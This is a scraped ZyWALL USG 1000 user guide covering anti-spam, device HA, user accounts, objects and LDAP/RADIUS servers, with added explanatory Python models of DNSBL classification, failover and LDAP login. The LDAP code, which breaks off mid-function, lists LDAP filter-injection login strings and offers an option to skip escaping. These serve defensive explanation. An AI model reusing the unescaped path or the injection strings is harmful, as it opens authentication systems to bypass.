Page 661: ... is also known as a DNS spam blocking list The ZyWALL can check the routing addresses of e mail against DNSBLs and classify an e mail as spam if it was sent or forwarded by a computer with an IP address in the DNSBL Finding Out More See Section 38 7 on page 672 for more background information on anti spam 38 2 Before You Begin Configure your zones before you configure anti spam 38 3 The Anti Spam ...

Page 662: ...e mail session is when an e mail client and e mail server or two e mail servers connect through the ZyWALL Select how to handle concurrent e mail sessions that exceed the maximum number of concurrent e mail sessions that the anti spam feature can handle See the chapter of product specifications for the threshold Select Forward Session to have the ZyWALL allow the excess e mail sessions without any...

Page 663: ...ivate light bulb icon is lit when the entry is active and dimmed when the entry is inactive Priority This is the position of an anti spam policy in the list The ordering of your anti spam policies is important as the ZyWALL applies them in sequence Once traffic matches an anti spam policy the ZyWALL applies that policy and does not check the traffic against any more policies From The anti spam pol...

Page 664: ...elect how the ZyWALL is to log the event when the DNSBL times out or an e mail matches the white list black list or DNSBL no Do not create a log log Create a log on the ZyWALL log alert An alert is an e mailed log for more serious events that may need more immediate attention Select this option to have the ZyWALL send an alert From To Select source and destination zones for traffic to scan for spa...

Page 665: ...k list entry as spam Check DNSBL Select this check box to check e mail against the ZyWALL s configured DNSBL domains The ZyWALL classifies e mail that matches a DNS black list as spam Actions for Spam Mail Use this section to set how the ZyWALL is to handle spam mail SMTP Select how the ZyWALL is to handle spam SMTP mail Select drop to discard spam SMTP mail Select forward to allow spam SMTP mail ...

Page 666: ...mails that match the ZyWALL s spam black list Rule Summary Add Click this to create a new entry Edit Select an entry and click this to be able to modify it Remove Select an entry and click this to delete it Activate To turn on an entry select it and click Activate Inactivate To turn off an entry select it and click Inactivate Status The activate light bulb icon is lit when the entry is active and ...

Page 667: ...ding list screen enable the anti spam feature in the anti spam general screen and configure an anti spam policy to use the list Type Use this field to base the entry on the e mail s subject source or relay IP address source e mail address or header Select Subject to have the ZyWALL check e mail for specific content in the subject line Select IP Address to have the ZyWALL check e mail for a specifi...

Page 668: ... notation Netmask This field displays when you select the IP type Enter the subnet mask here if applicable Sender E Mail Address This field displays when you select the E Mail type Enter a keyword up to 63 ASCII characters See Section 38 4 2 on page 668 for more details Mail Header Field Name This field displays when you select the Mail Header type Type the name part of an e mail header the part t...

Page 669: ...78 Configuration Anti X Anti Spam Black White List White List LABEL DESCRIPTION General Settings Enable White List Checking Select this check box to have the ZyWALL forward e mail that matches an active white list entry without doing any more anti spam checking on that individual e mail Rule Summary Add Click this to create a new entry See Section 38 4 1 on page 667 for details Edit Select an entr...

Page 670: ...SBLs Figure 439 Configuration Anti X Anti Spam DNSBL Type This field displays whether the entry is based on the e mail s subject source or relay IP address source e mail address or a header Content This field displays the subject content source or relay IP address source e mail address or header value for which the entry checks OK Click OK to save your changes Cancel Click Cancel to exit this scre...

Page 671: ...address in the mail header This is the IP of the sender or the first server that forwarded the mail Select last N IPs to have the ZyWALL start checking from the last IP address in the mail header This is the IP of the last server that forwarded the mail Query Timeout Setting SMTP Select how the ZyWALL is to handle SMTP mail mail going to an e mail server if the queries to the DNSBL domains time ou...

Page 672: ... one non spam reply for each of an e mail s routing IP addresses the ZyWALL immediately classifies the e mail as legitimate and forwards it Any further DNSBL replies that come after the ZyWALL classifies an e mail as spam or legitimate have no effect The ZyWALL records DNSBL responses for IP addresses in a cache for up to 72 hours The ZyWALL checks an e mail s sender and relay IP addresses against...

Page 673: ...ate query to each of its DNSBL domains for IP address b b b b 2 DNSBL A replies that IP address a a a a does not match any entries in its list not spam 3 DNSBL C replies that IP address b b b b matches an entry in its list 4 The ZyWALL immediately classifies the e mail as spam and takes the action for spam that you defined in the anti spam policy In this example it was an SMTP mail and the defined...

Page 674: ...her separate query to each of its DNSBL domains for IP address d d d d 2 DNSBL B replies that IP address d d d d does not match any entries in its list not spam 3 DNSBL C replies that IP address c c c c does not match any entries in its list not spam 4 Now that the ZyWALL has received at least one non spam reply for each of the e mail s routing IP addresses the ZyWALL immediately classifies the e ...

Page 675: ...rate query to each of its DNSBL domains for IP address w x y z 2 DNSBL A replies that IP address a b c d does not match any entries in its list not spam 3 While waiting for a DNSBL reply about IP address w x y z the ZyWALL receives a reply from DNSBL B saying IP address a b c d is in its list 4 The ZyWALL immediately classifies the e mail as spam and takes the action for spam that you defined in t...
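The decision rules that pages 671 to 675 walk through, as an added worked example in Python (not ZyXEL's code and not taken from the guide). It implements the rules as the guide states them: a single "listed" reply for any routing IP classifies the e-mail as spam; one "not listed" reply for every routing IP classifies it as legitimate; replies that arrive after the decision have no effect; responses are cached for up to 72 hours; and if the queries time out, the per-protocol timeout action applies. The Received: header parsing, the lookup-name format (reversed octets under the list's zone, which is how DNSBLs are generally queried), and every address, zone name and header below are constructed for the demonstration and are assumptions about the device, not facts from the guide.

```python
import re
import time
from dataclasses import dataclass, field
from enum import Enum


class Verdict(Enum):
    SPAM = "spam"
    LEGITIMATE = "legitimate"
    UNDECIDED = "undecided"


RECEIVED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def routing_ips(headers, n, first):
    """'first N IPs' = the N addresses nearest the sender; 'last N IPs' = the
    N most recent relays. Each hop prepends its Received: header, so the
    bottom-most header is the sender side (assumption: one IP per line)."""
    hops = [m.group(1) for line in headers.splitlines()
            if line.startswith("Received:")
            for m in RECEIVED_IP.finditer(line)]
    sender_first = hops[::-1]
    return sender_first[:n] if first else sender_first[-n:]


def dnsbl_name(ip, zone):
    """Lookup name for one DNSBL query: octets reversed, under the list zone."""
    return ".".join(reversed(ip.split("."))) + "." + zone


@dataclass
class Decision:
    verdict: Verdict
    reason: str
    pending: set = field(default_factory=set)  # queries still unanswered


class DnsblClassifier:
    CACHE_TTL = 72 * 3600  # guide: DNSBL responses are cached for up to 72 hours

    def __init__(self, zones, timeout_verdict=Verdict.LEGITIMATE, clock=time.time):
        self.zones = list(zones)
        self.timeout_verdict = timeout_verdict  # the SMTP/POP3 "query timeout" action
        self.clock = clock
        self._cache = {}  # (ip, zone) -> (listed, expires_at)

    def _cached(self, ip, zone):
        hit = self._cache.get((ip, zone))
        return hit[0] if hit and hit[1] > self.clock() else None

    def classify(self, ips, replies):
        """ips: routing IPs of one e-mail. replies: (ip, zone, listed) tuples in
        the order they arrive; listed=None means that query timed out."""
        ips = list(dict.fromkeys(ips))
        pending = {(ip, zone) for ip in ips for zone in self.zones}
        clean = set()
        verdict, reason = Verdict.UNDECIDED, ""

        def consider(ip, zone, listed):
            nonlocal verdict, reason
            if verdict is not Verdict.UNDECIDED:
                return  # replies after the decision have no effect
            if listed:
                verdict, reason = Verdict.SPAM, f"{ip} listed by {zone}"
            elif listed is False:
                clean.add(ip)
                if clean >= set(ips):
                    verdict, reason = Verdict.LEGITIMATE, "one non-spam reply for every routing IP"

        for key in sorted(pending):       # cache first: no query needed for these
            cached = self._cached(*key)
            if cached is not None:
                pending.discard(key)
                consider(*key, cached)

        for ip, zone, listed in replies:  # then live replies, in arrival order
            if (ip, zone) not in pending:
                continue                  # duplicate or unexpected reply
            pending.discard((ip, zone))
            if listed is not None:
                self._cache[(ip, zone)] = (listed, self.clock() + self.CACHE_TTL)
            consider(ip, zone, listed)

        if verdict is Verdict.UNDECIDED and not pending:
            verdict, reason = self.timeout_verdict, "queries timed out without a decision"
        return Decision(verdict, reason, pending)


# Constructed headers and zones for the demo (documentation address ranges).
SAMPLE_HEADERS = (
    "Received: from mx2.example.net [203.0.113.7] by mail.example.com\n"
    "Received: from mx1.example.org [198.51.100.1] by mx2.example.net\n"
    "Received: from sender-pc [192.0.2.10] by mx1.example.org\n"
    "Subject: hello\n"
)
ZONES = ["bl-a.example", "bl-b.example", "bl-c.example"]
```

Feeding the page 673 exchange (a clean reply for one IP, then a listing for the other) returns SPAM on the second reply; the page 674 exchange returns LEGITIMATE after one clean reply per IP while four queries are still outstanding; a later mail from the listed IP is classified from the cache with no query at all. Note that with last N IPs the ZyWALL also checks the address of your own upstream relay, so a listing of that relay will flag all of its mail.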

Page 676: ...Chapter 38 Anti Spam ZyWALL USG 1000 User s Guide 676 ...

Page 677: ...Active Passive Mode screens Section 39 3 on page 680 to use active passive mode device HA You can configure general active passive mode device HA settings view and manage the list of monitored interfaces and synchronize backup ZyWALLs Use the Legacy Mode screens Section 39 5 on page 687 to use legacy mode device HA You can configure general legacy mode HA settings including link monitoring configu...

Page 678: ... virus IDP application patrol and system protect and certificates Note Only ZyWALLs of the same model and firmware version can synchronize Otherwise you must manually configure the master ZyWALL s settings on the backup by editing copies of the configuration files in a text editor for example Finding Out More See Section 6 5 24 on page 111 for related information on these screens See Section 39 7 ...

Page 679: ...ip between the master and backup ZyWALLs such as active active or using different ZyWALLs as the master for individual interfaces The master and its backups must all use the same device HA mode Click the link to go to the screen where you can configure the ZyWALL to use the device HA mode that it is not currently using Monitored Interface Summary This table shows the status of the interfaces that ...

Page 680: ...monitored interface s status in the virtual router Active This interface is up and using the virtual IP address and subnet mask Stand By This interface is a backup interface in the virtual router It is not using the virtual IP address and subnet mask Fault This interface is not functioning in the virtual router right now In active passive mode or in legacy mode with link monitoring enabled if one ...

Page 681: ...nd backup ZyWALLs. Each monitored interface must have a static IP address and be connected to the same subnet as the corresponding interface on the backup or master ZyWALL. Virtual Router and Management IP Addresses: if a backup takes over for the master, it uses the master's IP addresses. These IP addresses are known as the virtual router IP addresses. Each interface can also have a management IP addres...

Page 682: ...ses 39 3 1 Configuring Active Passive Mode Device HA The Device HA Active Passive Mode screen lets you configure general active passive mode device HA settings, view and manage the list of monitored interfaces, and synchronize backup ZyWALLs. To access this screen click Configuration Device HA Active Passive Mode. Figure 448 Configuration Device HA Active Passive Mode (figure labels: ZyWALL A 192.168.1.1, ZyWALL B 192.168.1.1, 192.1...)

Page 683: ...This field is available for a backup ZyWALL Select this if this ZyWALL should become the master ZyWALL if a lower priority ZyWALL is the master when this one is enabled If the role is master the ZyWALL preempts by default Cluster Settings Cluster ID Type the cluster ID number A virtual router consists of a master ZyWALL and all of its backup ZyWALLs If you have multiple ZyWALL virtual routers on y...

Page 684: ...synchronization to have a backup ZyWALL copy the master ZyWALL s configuration certificates AV signatures IDP and application patrol signatures and system protect signatures Every interface s management IP address must be in the same subnet as the interface s IP address the virtual router IP address Server Address If this ZyWALL is set to backup role enter the IP address or Fully Qualified Domain ...

Page 685: ...he same password If you leave this field blank in the master ZyWALL no backup ZyWALLs can synchronize from it If you leave this field blank in a backup ZyWALL it cannot synchronize from the master ZyWALL Auto Synchronize Select this to get the updated configuration automatically from the specified ZyWALL according to the specified Interval The first synchronization begins after the specified Inter...

Page 686: ...interfaces or disable the bridge interfaces connect the bridge interfaces activate device HA and finally reactivate the bridge interfaces Virtual Router IP VRIP Subnet Mask This is the interface s static IP address and subnet mask in the virtual router Whichever ZyWALL is currently serving as the master uses this virtual router IP address and subnet mask These fields are blank if the interface is ...

Page 687: ...es that have static IP addresses You can only enable one VRRP group for each interface and you can only have one active VRRP group for each virtual router If you create a VRRP group for an Ethernet interface that has a VLAN interface configured on it make sure you create a separate VRRP group for the VLAN interface This will avoid an IP conflict if the backup ZyWALL takes over for the master When ...

Page 688: ...183 Configuration Device HA Legacy Mode LABEL DESCRIPTION General Settings Link Monitoring Enable link monitoring to have the master ZyWALL shut down all of its VRRP interfaces if one of its VRRP interface links goes down This way the backup ZyWALL takes over all of the master ZyWALL s functions Stop Cellular interfaces while one of monitored interface is fault Select this to have the master ZyWAL...

Page 689: ...rtual Router IP Netmask This is the interface s IP address and subnet mask in the virtual router Management IP Netmask This field displays the management IP address and subnet mask of an interface Synchronization Server Address Enter the IP address or Fully Qualified Domain Name FQDN of the ZyWALL from which to get configuration and subscription service updates for services to which the backup ZyW...

Page 690: ...et configuration and subscription service updates automatically from the specified ZyWALL according to the specified Interval The first synchronization begins after the specified Interval the ZyWALL does not synchronize immediately Interval This field is only available if Auto Synchronize is checked Type the number of minutes to wait between synchronizations Apply switch to Legacy Mode This appear...

Page 691: ...ace's IP address for management access. You can use this IP address to access the ZyWALL whether it is the master or a backup. This management IP address must be in the same subnet as the interface IP address; if it is not, the backup ZyWALL cannot synchronize with the master via this VRRP interface. Manage IP Subnet Mask: enter the subnet mask of the interface's management IP address. Role: select the role that ...

Page 692: ...thod and password Choices are None this virtual router does not use any authentication method Text this virtual router uses a plain text password for authentication Type the password in the field next to the radio button The password can consist of alphanumeric characters the underscore and some punctuation marks and it can be up to eight characters long IP AH MD5 this virtual router uses an encry...

Page 693: ...ZyWALL B are not connected. 2 Configure the bridge interface on the master ZyWALL, set the bridge interface as a monitored interface, and activate device HA. 3 Configure the bridge interface on the backup ZyWALL, set the bridge interface as a monitored interface, and activate device HA. (Figure labels: ZyWALLs A and B, bridge Br0 over ge4 and ge5.)

Page 694: ... interfaces, activate device HA, and finally reactivate the bridge interfaces, as shown in the following example. 1 In this case the ZyWALLs are already connected but the bridge interfaces have not been configured yet. Configure a bridge interface on the master ZyWALL but leave it disabled. Then set the bridge interface as a monitored interface and activate device HA. (Figure labels: ZyWALLs A and B, bridge Br0 over ge4 and ge5.)

Page 695: ...ce on the backup ZyWALL. Then set the bridge interface as a monitored interface and activate device HA. 3 Enable the bridge interface on the master ZyWALL and then on the backup ZyWALL. 4 Connect the ZyWALLs. (Figure labels: ZyWALLs A and B, bridge Br0 over ge4 and ge5, marked Disabled before step 3.)

Page 696: ...P address as the default gateway and forwards traffic for the network ZyWALL B is a backup It is using its management IP address 192 168 10 112 ZyWALL A sends regular messages to ZyWALL B to let ZyWALL B know that ZyWALL A is available If ZyWALL A becomes unavailable it stops sending messages to ZyWALL B ZyWALL B detects this and assumes the role of the master This is illustrated below Figure 453 ...
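The master/backup exchange that page 696 describes, as an added example in Python (not ZyXEL's code; the guide does not document the message format). It models one virtual router with the knobs the chapter exposes: cluster ID, priority, preempt, link monitoring on a monitored interface, and the Text authentication password of at most eight characters from page 692. The timing (a master-down interval of three advertisement intervals plus a priority-dependent skew) is taken from VRRP, RFC 3768, and is an assumption about how the ZyWALL behaves; the unit names, addresses, password and the 0.5 s simulation step are constructed for the demonstration.

```python
import hmac
import ipaddress
from dataclasses import dataclass
from enum import Enum


class State(Enum):
    INIT = "init"
    BACKUP = "backup"   # the guide's Stand-By
    MASTER = "master"   # the guide's Active
    FAULT = "fault"


@dataclass(frozen=True)
class Advert:
    """One 'I am alive' message from the master (constructed, not the real format)."""
    cluster_id: int
    priority: int
    src_ip: str
    auth: str = ""  # the guide's Text method: plain password, at most 8 chars


class HaNode:
    def __init__(self, name, ip, cluster_id, priority, preempt=True,
                 password="", adv_interval=1.0, monitored=()):
        if not 1 <= priority <= 254:
            raise ValueError("priority must be 1..254")
        if len(password) > 8:
            raise ValueError("Text authentication password is at most 8 characters")
        self.name, self.ip, self.cluster_id = name, ip, cluster_id
        self.priority, self.preempt, self.password = priority, preempt, password
        # Assumption (VRRP, RFC 3768): wait three advertisement intervals plus a
        # skew that is shorter for higher priorities before claiming mastership.
        self.master_down = 3 * adv_interval + (256 - priority) / 256
        self.links = {ifname: True for ifname in monitored}
        self.state = State.INIT
        self.last_advert = 0.0

    def start(self, now):
        self.state = State.BACKUP
        self.last_advert = now

    def link_event(self, ifname, up, now):
        """Link monitoring: one monitored link down takes this unit out of the
        virtual router entirely, so the peer takes over all interfaces."""
        self.links[ifname] = up
        if not up and self.state in (State.MASTER, State.BACKUP):
            self.state = State.FAULT
        elif up and all(self.links.values()) and self.state is State.FAULT:
            self.start(now)

    def receive(self, adv, now):
        if self.state in (State.INIT, State.FAULT):
            return
        if adv.cluster_id != self.cluster_id or adv.src_ip == self.ip:
            return  # another virtual router, or our own message
        if not hmac.compare_digest(adv.auth.encode(), self.password.encode()):
            return  # authentication failed: the message is ignored
        peer_wins = (adv.priority > self.priority or
                     (adv.priority == self.priority and
                      ipaddress.ip_address(adv.src_ip) > ipaddress.ip_address(self.ip)))
        if self.state is State.MASTER:
            if peer_wins:
                self.state = State.BACKUP  # a better master appeared: yield
                self.last_advert = now
        elif peer_wins or not self.preempt:
            self.last_advert = now  # accept the current master, reset the timer
        # otherwise we outrank the master and preempt is on: let the timer
        # expire and take over in tick()

    def tick(self, now):
        """Call periodically; returns the Advert to send if we are master."""
        if self.state is State.BACKUP and now - self.last_advert > self.master_down:
            self.state = State.MASTER
        if self.state is State.MASTER:
            return Advert(self.cluster_id, self.priority, self.ip, self.password)
        return None


def failover_demo(preempt=True):
    """A (priority 200) and B (priority 100) in cluster 1; A loses its monitored
    link at t=10 s and gets it back at t=20 s. Returns the state changes."""
    a = HaNode("A", "192.168.1.2", 1, 200, preempt, "s3cret", monitored=("ge1",))
    b = HaNode("B", "192.168.1.3", 1, 100, True, "s3cret", monitored=("ge1",))
    a.start(0.0)
    b.start(0.0)
    events = {10.0: lambda now: a.link_event("ge1", False, now),
              20.0: lambda now: a.link_event("ge1", True, now)}
    timeline = []
    for step in range(61):  # 30 s of simulated time in 0.5 s steps
        t = step * 0.5
        if t in events:
            events[t](t)
        for adv in [n.tick(t) for n in (a, b)]:
            if adv is not None:
                for n in (a, b):
                    n.receive(adv, t)
        snapshot = (a.state, b.state)
        if not timeline or timeline[-1][1] != snapshot:
            timeline.append((t, snapshot))
    return timeline
```

With preempt on, A takes over at 3.5 s, drops to Fault when its link goes down, B becomes master about 3.6 s after A's last message, and A reclaims mastership 3.5 s after its link returns; with preempt off, A stays Stand-By once B is master. The Text method puts the password on the wire in the clear, so anyone on the HA segment can read it and inject advertisements; keep that segment private and prefer IP AH MD5 where both units support it.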

Page 697: ... still recommended that the backup ZyWALL synchronize with a master ZyWALL on a secure network The backup ZyWALL gets the configuration from the master ZyWALL The backup ZyWALL cannot become the master or be managed while it applies the new configuration This usually takes two or three minutes or longer depending on the configuration complexity The following restrictions apply with active passive ...


Page 699: ...s users and other user groups You cannot put admin users in user groups The Setting screen see Section 40 4 on page 707 controls default settings login settings lockout settings and other user settings for the ZyWALL You can also use this screen to specify when users must log in to the ZyWALL before it routes traffic for them 40 1 2 What You Need To Know User Account A user account defines the pri...

Page 700: ...respectively. Note: if the ZyWALL tries to authenticate an ext-user using the local database, the attempt always fails. Once an ext-user has been authenticated, the ZyWALL tries to get the user type (see Table 185 on page 699) from the external server. If the external server does not have the information, the ZyWALL sets the user type for this session to User. For the rest of the user attributes, such a...

Page 701: ...er group The sequence of members in a user group is not important User Awareness By default users do not have to log into the ZyWALL to use the network services it provides The ZyWALL automatically routes packets for everyone If you want to restrict network services that certain users can use via the ZyWALL you can require them to log in to the ZyWALL first The ZyWALL is then aware of the user who...

Page 702: ...ng characters Alphanumeric A z 0 9 there is no unicode support _ underscores Table 186 Configuration Object User Group LABEL DESCRIPTION Add Click this to create a new entry Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so O...

Page 703: ...FS or FTP, it will use the account settings used for BOB, not bob. User names have to be different from user group names. Here are the reserved user names: adm, admin, any, bin, daemon, debug, devicehaecived, ftp, games, halt, ldap-users, lp, mail, news, ... To access this screen go to the User screen (see Section 40 2 on page 702) and click either the Add icon or an Edit icon. Figure 455 Configuration User Group User Add

Page 704: ... alphanumeric characters Retype This field is not available if you select the ext user or ext group user type Group Identifier This field is available for a ext group user type user account Specify the value of the AD or LDAP server s Group Membership Attribute that identifies the group to which this user belongs Associated AAA Server Object This field is available for a ext group user type user a...

Page 705: ...number of minutes unlimited Unlike Lease Time the user has no opportunity to renew the session without logging out Configuration Validation Use a user account from the group specified above to test if the configuration is correct Enter the account s user name in the User Name field and click Test OK Click OK to save your changes back to the ZyWALL Cancel Click Cancel to exit this screen without sa...

Page 706: ...his field displays the name of each user group Description This field displays the description for each user group Member This field lists the members in the user group Each member is separated by a comma Table 188 Configuration Object User Group Group continued LABEL DESCRIPTION Table 189 Configuration User Group Group Add LABEL DESCRIPTION Name Type the name for this user group You may use 1 31 ...

Page 707: ... been added to the user group The order of members is not important Select users and groups from the Available list that you want to be members of this group and move them to the Member list You can double click a single entry to move it or use the Shift or Ctrl key to select multiple entries and use the arrow button to move them Move any members you do not want included to the Available list OK C...

Page 708: ...hentication Timeout Settings Default Authentication Timeout Settings These authentication timeout settings are used by default when you create a new user account They also control the settings for any existing user accounts that are set to use the default settings You can still manually configure any user account s authentication timeout settings Edit Double click an entry or select it and click E...

Page 709: ...cally see Section 40 4 on page 707 the users can select this check box on their screen as well In this case the session is automatically renewed before the lease time expires Reauthentication Time This is the default reauthentication time in minutes for each type of user account It defines the number of minutes the user can be logged into the ZyWALL in one session before having to log in again Unl...

Page 710: ...t on the number of simultaneous logins by non admin users If you do not select this access users can login as many times as they want as long as they use different IP addresses Maximum number per access account This field is effective when Limit for access account is checked Type the maximum number of simultaneous logins by each access user User Lockout Settings Enable logon retry limit Select thi...

Page 711: ...ntained in a remote server such as RADIUS or LDAP See Ext Group User Accounts on page 701 for more information about this type Lease Time Enter the number of minutes this type of user account has to renew the current session before the user is logged out You can specify 1 to 1440 minutes You can enter 0 to make the number of minutes unlimited Admin users renew the session every time the main scree...

Page 712: ...ically logs them out. The ZyWALL sets this amount of time according to the following fields: the User-defined lease time field in this screen; the Lease time field in the User Add/Edit screen (see Section 40 2 1 on page 702); the Lease time field in the Setting screen (see Section 40 4 on page 707). Updating lease time automatically: this box appears if you checked the Allow renewing lease time automatically box in the Setting screen S...

Page 713: ...ge number of Ext User accounts you might use CLI commands instead of the Web Configurator to create the accounts Extract the user names from the LDAP or RADIUS server and create a shell script that creates the user accounts See Chapter 52 on page 863 for more information about shell scripts Table 193 LDAP RADIUS Keywords for User Attributes KEYWORD CORRESPONDING ATTRIBUTE IN WEB CONFIGURATOR type ...


Page 715: ... dynamic routes firewall rules application patrol content filtering and VPN connection policies For example addresses are used to specify where content restrictions apply in content filtering Please see the respective sections for more information about how address objects and address groups are used in each one Address groups are composed of address objects and address groups The sequence of memb...

Page 716: ...ick this to create a new entry Edit Double click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for an exam...

Page 717: ...s subnet or gateway if the interface s IP address settings change For example if you change ge1 s IP address the ZyWALL automatically updates the corresponding interface based LAN subnet address object IP Address This field is only available if the Address Type is HOST This field cannot be blank Enter the IP address that this address object represents Starting IP Address This field is only availab...

Page 718: ...epresents OK Click OK to save your changes back to the ZyWALL Cancel Click Cancel to exit this screen without saving your changes Table 195 Configuration Object Address Address Edit continued LABEL DESCRIPTION Table 196 Configuration Object Address Address Group LABEL DESCRIPTION Add Click this to create a new entry Edit Double click an entry or select it and click Edit to be able to modify the en...

Page 719: ...dashes but the first character cannot be a number This value is case sensitive Description This field displays the description of each address group if any You can use up to 60 characters punctuation marks and spaces Member List The Member list displays the names of the address and address group objects that have been added to the address group The order of members is not important Select items fr...


Page 721: ...level protocol that is sent in this packet This section discusses three of the most common IP protocols Computers use Transmission Control Protocol TCP IP protocol 6 and User Datagram Protocol UDP IP protocol 17 to exchange data with each other TCP guarantees reliable delivery but is slower and more complex Some uses are FTP HTTP SMTP and TELNET UDP is simpler and faster but is less reliable Some ...

Page 722: ...IP protocols TCP applications UDP applications ICMP messages user defined services for other types of IP protocols These objects are used in policy routes firewall rules and IDP profiles Use service groups when you want to create the same rule for several services instead of creating separate rules for each service Service groups may consist of services and other service groups The sequence of mem...

Page 723: ...ouble click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for an example This field is a sequential value ...

Page 724: ... may use 1 31 alphanumeric characters underscores _ or dashes but the first character cannot be a number This value is case sensitive IP Protocol Select the protocol the service uses Choices are TCP UDP ICMP and User Defined Starting Port Ending Port This field appears if the IP Protocol is TCP or UDP Specify the port number s used by this service If you fill in one of these fields the service use...

Page 725: ...ick Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for an example This field is a sequential value and it is not associated with a specific...

Page 726: ... underscores _ or dashes but the first character cannot be a number This value is case sensitive Description Enter a description of the service group if any You can use up to 60 printable ASCII characters Member List The Member list displays the names of the service and service group objects that have been added to the service group The order of members is not important Select items from the Avail...

Page 727: ...of all schedules in the ZyWALL Use the One Time Schedule Add Edit screen Section 43 2 1 on page 729 to create or edit a one time schedule Use the Recurring Schedule Add Edit screen Section 43 2 2 on page 730 to create or edit a recurring schedule 43 1 2 What You Need to Know One time Schedules One time schedules begin on a specific start date and time and end on a specific stop date and time One t...

Page 728: ...nfiguration Object Schedule LABEL DESCRIPTION One Time Add Click this to create a new entry Edit Double click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which sett...

Page 729: ... confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for an example This field is a sequential value and it is not associated with a specific schedule Name This field displays the name of the schedule which is used to refer to the schedule Start Time This...

Page 730: ...l dates such as February 31 Hour 0 23 Minute 0 59 StartTime Specify the hour and minute when the schedule begins Hour 0 23 Minute 0 59 StopDate Specify the year month and day when the schedule ends Year 1900 2999 Month 1 12 Day 1 31 it is not possible to specify illegal dates such as February 31 Hour 0 23 Minute 0 59 StopTime Specify the hour and minute when the schedule ends Hour 0 23 Minute 0 59...

Page 731: ...ing LABEL DESCRIPTION Configuration Name Type the name used to refer to the recurring schedule You may use 1 31 alphanumeric characters underscores _ or dashes but the first character cannot be a number This value is case sensitive Date Time StartTime Specify the hour and minute when the schedule begins each day Hour 0 23 Minute 0 59 StopTime Specify the hour and minute when the schedule ends each...


Page 733: ...see Chapter 45 on page 743 44 1 1 Directory Service AD LDAP LDAP AD allows a client the ZyWALL to connect to a server to retrieve information from a directory A network example is shown next Figure 474 Example Directory Service Client and Server The following describes the user authentication procedure via an LDAP AD server 1 A user logs in with a user name and password pair 2 The ZyWALL tries to ...

Page 734: ... feature Purchase a ZyWALL OTP package in order to use this feature The package contains server software and physical OTP tokens PIN generators Do the following to use OTP See the documentation included on the ASAS CD for details 1 Install the ASAS server software on a computer 2 Create user accounts on the ZyWALL and in the ASAS server 3 Import each token s database file located on the included C...

Page 735: ...nticate VPN users Directory Service LDAP AD LDAP Lightweight Directory Access Protocol AD Active Directory is a directory service that is both a directory and a protocol for controlling access to a network The directory consists of a database specialized for fast information retrieval and filtering activities You create and store user profile and login information on the external server RADIUS RAD...

Page 736: ...any c JP Base DN A base DN specifies a directory A base DN usually contains information such as the name of an organization a domain name and or country For example o MyCompany c UK where o means organization and c means country Bind DN A bind DN is used to authenticate with an LDAP AD server For example a bind DN of cn zywallAdmin allows the ZyWALL to log into the LDAP AD server using the user na...

Page 737: ...Server Click Object AAA Server Active Directory or LDAP to display the Active Directory or LDAP screen Click the Add icon or an Edit icon to display the Table 205 Configuration Object AAA Server Active Directory or LDAP LABEL DESCRIPTION Add Click this to create a new entry Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To r...

Page 738: ...N Name Enter a descriptive name up to 63 alphanumerical characters for identification purposes Description Enter the description of each server if any You can use up to 60 printable ASCII characters Server Address Enter the address of the AD or LDAP server Backup Server Address If the AD or LDAP server has a backup server enter its address here Port Specify the port number on the AD or LDAP server...

Page 739: ...ogin Name Attribute Enter the type of identifier the users are to use to log in For example name or e mail address Alternative Login Name Attribute If there is a second type of identifier that the users can use to log in enter it here For example name or e mail address Group Membership Attribute An AD or LDAP server defines attributes for its accounts Enter the name of the attribute that the ZyWAL...
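The login sequence from page 733 (bind, look the user up by the Login Name Attribute under the Base DN, then verify the password) together with the Group Membership Attribute mapping on page 739, as an added example in Python. It is not ZyXEL's code: the directory is a constructed in-memory stand-in with a minimal filter evaluator so the block runs offline, and the attribute names (sAMAccountName, mail, memberOf), DNs and passwords are assumptions. What it adds to the description above is that the login name is untrusted input: it is escaped per RFC 4515 before it goes into the search filter, and a lookup that matches anything other than exactly one entry is refused.

```python
import re
from dataclasses import dataclass


def ldap_escape(value):
    """RFC 4515 escaping of a filter assertion value, so a login name such as
    'adm*' or 'x)(mail=*' is matched literally instead of being interpreted."""
    return "".join("\\%02x" % ord(c) if c in "\\*()\0" else c for c in value)


def login_filter(login_attr, alt_login_attr, login_name, escape=True):
    """Filter for the Login Name Attribute and, if set, the Alternative one."""
    v = ldap_escape(login_name) if escape else login_name
    if alt_login_attr:
        return f"(|({login_attr}={v})({alt_login_attr}={v}))"
    return f"({login_attr}={v})"


# --- constructed in-memory directory with a minimal filter evaluator -------

def _unescape(v):
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), v)


def _value_matches(pattern, actual):
    # '*' is the only wildcard; everything else is literal once unescaped.
    rx = ".*".join(re.escape(_unescape(p)) for p in pattern.split("*"))
    return re.fullmatch(rx, actual, re.IGNORECASE) is not None


def _parse(s):
    """Parse (&...), (|...) or (attr=value); returns (matcher, unparsed rest)."""
    if s[1] in "&|":
        combine, s, subs = (all if s[1] == "&" else any), s[2:], []
        while s.startswith("("):
            f, s = _parse(s)
            subs.append(f)
        return (lambda a, subs=subs: combine(f(a) for f in subs)), s[1:]
    end = s.index(")")
    attr, _, pat = s[1:end].partition("=")
    return (lambda a: any(_value_matches(pat, v) for v in a.get(attr, ()))), s[end + 1:]


class FakeDirectory:
    def __init__(self, entries, passwords):
        self.entries = entries      # dn -> {attribute: [values]}
        self.passwords = passwords  # dn -> password

    def bind(self, dn, password):
        return self.passwords.get(dn) == password

    def search(self, base_dn, filt):
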